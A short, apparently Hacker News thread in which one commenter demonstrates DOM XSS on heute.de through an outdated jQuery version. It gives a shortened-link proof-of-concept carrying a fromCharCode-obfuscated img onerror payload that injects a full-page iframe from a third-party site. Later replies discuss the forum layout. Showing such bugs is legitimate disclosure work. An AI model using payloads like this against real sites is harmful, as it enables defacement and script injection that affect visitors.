[nilsjuenemann]

That isn't true. Every static website could be vulnerable through DOM XSS. In this case the integrity of the site is violated.

PoC: http://bit.ly/1S834lS - redirects to http://www.heute.de/#"><img src=x onerror=document.write(String.fromCharCode(60,105,102,114,97,109,101, 32,115,114,99,61,34,104,116,116,112,58,47,47,99,97,116, 46,119,119,119,46,104,101,117,116,101,46,100,101,46,109,101,111,119, 98,105,102,121,46,99,111,109,47,34,32,115,116,121,108,101,61,34,98, 111,114,100,101,114,58,32,48,59,32,119,105,100,116,104,58,32,49,48, 48,37,59,32,104,101,105,103,104,116,58,32,49,48,48,37,59,32,109,97, 114,103,105,110,58,32,45,56,112,120,59,112,111,115,105,116,105,111, 110,58,32,97,98,115,111,108,117,116,101,59,34,62))>

We just inject a iframe through the onerror handler of the <img> tag:

<iframe src="http://cat.www.heute.de.meowbify.com/" style="border: 0; width: 100%; height: 100%; margin: -8px;position: absolute;"></iframe>

In this case the site is using a outdated jQuery version, which is vulnerable to this kind of attack.

http://bugs.jquery.com/ticket/9521

[mcintyre1994]

Hey, would you mind splitting that line up a bit? It's screwing with the layout and making a lot of comments really wide.

Edit: Thanks :)

[liviu-]

Sounds like a bug in HN layout. One fix is setting ".default" a `max-width` attribute, and ".comment { overflow-wrap: break-word; }`.

User styles managers can fix this per user, but I sent HN an email to let them know.